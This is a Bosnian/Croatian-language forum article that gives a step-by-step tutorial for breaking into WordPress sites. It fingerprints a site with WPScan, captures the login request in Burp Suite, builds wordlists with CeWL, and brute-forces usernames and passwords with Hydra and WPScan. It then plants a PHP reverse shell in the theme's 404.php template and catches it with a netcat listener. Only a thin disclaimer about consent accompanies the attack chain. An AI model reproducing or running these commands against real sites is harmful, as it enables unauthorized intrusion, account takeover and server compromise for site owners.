Registrirajte se na forum.
Učestvujte u diskusijama i iznesite vaše stavove.
Kliknite ovdje.

Kako hakovati web stranicu?

Ovaj članak će sadržavati uputstvo kako provaliti u sustav stranice, te kako preuzeti kontrolu nad stranicom.

Uputstvo je izričito u dobre namjere, i nemojte zlu koristiti, odnosno ne provaljujte nepotrebno u stranice online magazina, političkih stranaka i slično kako biste nešto dokazali, jer oni i onako nemaju nikakvu internet snagu.
Ovo strogo koristite samo u situaciji da je vama ili nekoj trećoj strani potrebno uz pristanak iste.

Članak nije namijenjen publici koja ne razumije određene osnove u ovom polju.

Većina današnjih stranica koristi WordPress CMS, zato ću se u tutorijalu fokusirati na ovaj CMS, jer bi mogao napisati roman kako ući na različite CMS-ove.

Provjerite da li stranica koristi WordPress

Ako ne znate koristi li web stranica WordPress, obično to možete pronaći na vrlo jednostavan način.
Jednostavno možete unijeti: www.domena.com/wp-admin

U većini slučajeva, wp-admin GUI će se otvoriti za prijavu, ako ga administrator nije onemogućio.

Još jedan dobar način da provjerite da li stranica koristi WordPress je korištenje, odnosno rpavilno korištenje WPScan-a.
WPScan je unaprijed instaliran u programima Kali i ParrotSec.

wpscan -u www. domena . com

domena” promijenite u domenu stranice koju provjeravate.
Kada pokrenete ovu operaciju, rezultat će jasno prikazati da li se radi o WordPress stranici, u vidu. WordPress version x.x.x.

Osim što će vam prikazati da li se radi o WordPress stranici, prikazaće vam koliko ranjivosti ima stranica, na primjer: 21 vulnerabilities.

Sada to možemo provjeriti da li postoji stranica za prijavu tako što ćemo doći do URL-a web stranice URL + /wp-admin.

Uzimanje koda uz pomoć Burpsuite

Sad je najteži dio, treba pronaći korisničko ime.
Možete započeti od pretpostavke da je to administrator ili admin, ali WordPress obično generira slučajno korisničko ime, tako da ga može biti teško shvatiti, odnosno saznati, pa možda ćete trebati napraviti još neko daljnje istraživanje cilja.

Pokrenite burpsuite tipkanjem:

sudo burpsuite

Stvorite novi, privremeni projekt koristeći zadane postavke Burp-a.

Otvorite karticu Target (Odredište) -> Scope (Scope) i kliknite Add (Dodaj) da stranicu wp-login uključite u opseg.
nakon toga u skočnom dijalogu odaberite Yes (Da).

Zatim idite na izbornik “Preferences / Postavke” u Firefoxu i pomaknite se prema dolje dok ne pronađete “Mrežni proxy / Network Proxy“.
Kliknite “Postavke / Settings“.

Odaberite “Ručna konfiguracija proxyja / Manual proxy configuration” i unesite IP 127.0.0.1 i port 8080.
Označite „Koristi ovaj proxy server za sve protokole / Use this proxy server for all protocols“. 
Kliknite OK.

Vratite se na Burpsuite.
Otvorite karticu proxyja.
Sada se vratite na stranicu za prijavu na WP.
Unesite bilo koje slučajno korisničko ime i lozinku i kliknite “Prijava / Login“.
Obavezno onemogućite Privacy Badger, NoScript i uBlock Origins za web mjesto.

Jednom kada ste kliknuli na prijavu, vratite se na Burpsuite i pogledajte ispis.

Trebao bi se pojaviti ispis tipa:

log=root&pwd=0000&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.1.109%2Fwp-admin%2F&testcookie=1

Pronalaženje ispravnog korisničkog imena

Prvo se vratite u svoj Burpsuite, a zatim ga zatvorite. Sad nam više nije potreban. Vratite se također na postavke proxyja i ponovo onemogućite proxy.

Sada možete otići na neku stranicu, na primjer na Wikipedia stranicu Mr. Robot: https://en.wikipedia.org/wiki/Mr._Robot

Odavde kreirajte listu korisničkih imena koristeći CeWL.

Otvorite novi prozor terminala i otkucajte:

sudo cewl -w usernames.txt -d1 -m4 https://en.wikipedia.org/wiki/Mr._Robot

Objašnjenje:

  • -w usernames.txt – Trebalo bi biti prilično jasno, ovo je ime popisa riječi koje će se stvoriti.
  • -d1 – Definira dubinu u kojoj će CeWL indeksirati web stranicu.
    1 označava da će ostati na upravo toj web lokaciji i neće otvarati nikakve veze na njoj.
  • -m4 – Definira minimalnu dužinu riječi koja će se staviti na listu.
  • https://en.wikipedia.org/wiki/Mr._Robot – Očito je web stranica koju ćemo pretraživati.

Stoga, kao što vidite, ovu tehniku ​​možete primijeniti na bilo kojem ciljanom mjestu.

Pokretanjem operacije:

ls

pokazuje nam da je stvorena datoteka naših korisničkih imena u .txt formatu.

U nekim slučajevima ako imate sreće, korištenjem ove operacije možete doći do korisničkih imena:

wpscan --url http://www.domena.com --enumerate u

Bruteforcing korisničkih imena s Hydrom

U redu, vrijeme je da dodate korisničko ime u Hydru.
Otvorite novi prozor terminala i upišite:

hydra -V -L usernames.txt -p whatever 192.168.1.109 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log:F=Invalid username'
  • -V – Opširno.
  • -L – Naša lista korisničkih imena .txt formata.
  • -p whatever – Lozinka nas ne zanima, jer želimo saznati korisničko ime.
  • http-post-form – Vrsta napada Brute Force koju želimo izvesti.
  • /wp-login.php – Put do obrasca za prijavu.
  • log = ^USER^&pwd=^PASS^&wp-submit=Log+In – Vrijednosti koje će biti poslane u obrazac, gdje su ^ USER ^ i ^ PASS ^ rezervirani za naše opcije -L i -p.
  • F=Invalid username – Kaže hidri da pokušaj nije uspio ako vrati nevažeće korisničko ime.

Nakon pokretanja i dovršavanja ove komande, u rezultatima ćemo imati  uspješnu prijavu koristeći određeno korisničko ime iz liste, ali ne i lozinku, jer ovo samo potvrđuje da web obrazac ne vraća nevažeće korisničko ime.
Stoga, još uvijek moramo saznati lozinku.
Ali barem imamo korisničko ime.

Grubo forsiranje lozinke

Sada možemo koristiti i Hydra za grubu provedbu korisničkih lozinki, ali ja radije koristim wpscan jer je sintaksa lakša.

wpscan --url http://192.168.1.109/wp-login.php --passwords /usr/share/wordlists/passwordsboomed.txt.gz --usernames halid --wp-content-dir http://192.168.1.109/wp-login.php

passwordsboomed.txt.gz – Samo primjer, zamijenite bilo kojim popisom lozinki koji želite koristiti.

I dobili smo korisničko ime i lozinku.

Implementacija zlonamernog koda u WordPress

U redu, sada kada već imamo administratorski pristup WordPressu, postoji nekoliko načina koji će vam pomoći da krenete odavde.
Pokazat ću vam jedan od lakših načina.

Na napadačkom računalu idite na “Mjesta/ Places” -> “Datotečni sustav / File System” -> “usr” -> “dijeljenje / share” -> “mrežna ljuska / webshells” -> “php” i otvorite php-reverse-shell.php.

Kopirajte sav sadržaj.

Sada u WordPressu idite na “Izgled / Appearance”  -> “Uređivač / Editor” i odaberite predložak 404.php.
Ovo je samo primjer, kôd možete implementirati na mnogo različitih načina.

Sada ovdje zalijepite svoj kod.

Uredite linije IP i PORT tako da IP usmjerava na vaše računalo koje napada i odaberite odgovarajući port.

Pokretanje Netcat slušatelja

Sada se vratimo na računar koji napada i pokrećemo Netcat slušatelja:

nc -lvp 443

Otvorite stranicu 404 tako što idete na link: www.domena.com/404

Ne samo da smo provalili u administratorski račun za WordPress, već smo imali i pristup samom poslužitelju.
Odavde trebate koristiti vlastite vještine da biste postigli veća prava pristupa, ali to sada ne bi trebalo biti previše teško.

Lapan
Naše web mjesto je omogućeno prikazivanjem internetskih oglasa našim posjetiteljima.
Onemogućite vaš blokator i kliknite na ovaj tekst.